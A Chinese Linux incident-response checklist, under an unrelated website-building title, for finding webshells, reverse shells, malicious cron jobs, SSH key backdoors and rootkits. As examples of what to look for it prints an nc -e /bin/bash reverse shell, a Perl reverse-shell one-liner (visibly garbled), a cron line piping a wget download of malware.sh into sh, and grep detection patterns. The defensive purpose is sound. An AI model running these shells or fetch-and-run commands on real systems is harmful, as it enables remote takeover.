南通外贸建站响应式网站 html
声明!本文章所有的工具分享仅仅只是供大家学习交流为主,切勿用于非法用途,如有任何触犯法律的行为,均与本人及团队无关!!!
1. 检查异常文件
(1)查找最近修改的文件
# 查找最近3天内被修改的文件(重点检查Web目录)
find /var/www/ -type f -mtime -3 -ls | sort -k8
● 重点关注:.php、.jsp、.asp、.sh 等可执行文件。
● 隐藏文件:检查 /tmp/、/dev/shm/ 等临时目录。
(2)查找可疑文件名
# 查找包含常见后门特征的文件名
find / -name "*shell*" -o -name "*backdoor*" -o -name "*b374k*" -o -name "*c99*" -ls
● 常见WebShell:shell.php、b374k.php、c99.php、wso.php。
● 隐藏技巧:攻击者可能使用 …gif.php 伪装成图片。
(3)查找大文件(可能含加密数据)
find / -type f -size +5M -exec ls -lh {} \; | grep -v "log\|cache"
● 异常大文件:可能是攻击者存放的加密数据或恶意代码。
2. 检查异常进程
(1)查看运行中的可疑进程
ps aux | grep -E "(sh|bash|perl|python|nc|ncat|socat|wget|curl|\.\/)"
● 常见后门进程:
● nc -lvp 4444 -e /bin/bash(反弹Shell)
● perl -e 'use Socket; i = " x . x . x . x " ; i="x.x.x.x"; i="x.x.x.x";p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));connect(S,sockaddr_in( p , i n e t a t o n ( p,inet_aton( p,inetaton(i)));open(STDIN,“>&S”);open(STDOUT,“>&S”);open(STDERR,“>&S”);exec(“/bin/sh -i”);
(2)检查隐藏进程
# 查看所有进程(包括无二进制文件的进程)
top -c
● 异常进程:无对应文件、占用高CPU、奇怪命令行参数。
(3)检查网络连接
netstat -antp | grep ESTABLISHED
ss -tulnp
● 可疑外联IP:连接到未知IP的 bash、sh、nc 进程。
3. 检查定时任务
(1)查看用户级定时任务
crontab -l
(2)检查系统级定时任务
ls -la /etc/cron.*
cat /etc/crontab
● 异常任务:如 wget http://x.x.x.x/malware.sh | sh。
4. 检查SSH后门
(1)查看SSH登录记录
cat /var/log/auth.log | grep "Accepted"
cat /var/log/secure | grep "Accepted" # CentOS
● 异常登录:陌生IP、非工作时间登录。
(2)检查SSH密钥
ls -la ~/.ssh/authorized_keys
● 攻击者可能添加自己的公钥,实现免密登录。
(3)检查SSH配置文件
cat /etc/ssh/sshd_config | grep -E "(PermitRootLogin|AllowUsers|Port)"
● 异常配置:PermitRootLogin yes(应禁用root登录)
5. 检查内核级Rootkit
(1)检查系统调用劫持
strace -p <PID> # 跟踪进程的系统调用
● 异常行为:如 open(“/etc/shadow”) 或 execve(“/bin/sh”)。
(2)使用专用工具检测
# 安装并运行Rootkit检测工具
sudo apt install rkhunter chkrootkit -y
sudo rkhunter --check
sudo chkrootkit
6. 检查Web日志
(1)查找可疑HTTP请求
cat /var/log/apache2/access.log | grep -E "(cmd=|eval|system|passthru|shell_exec)"
● 常见攻击特征:
○ GET /index.php?cmd=whoami
○ POST /upload.php -F “file=@shell.php”
(2)检查大流量IP
cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -nr | head -n 10
● 高频访问IP:可能是攻击者在扫描或爆破。
7.总结
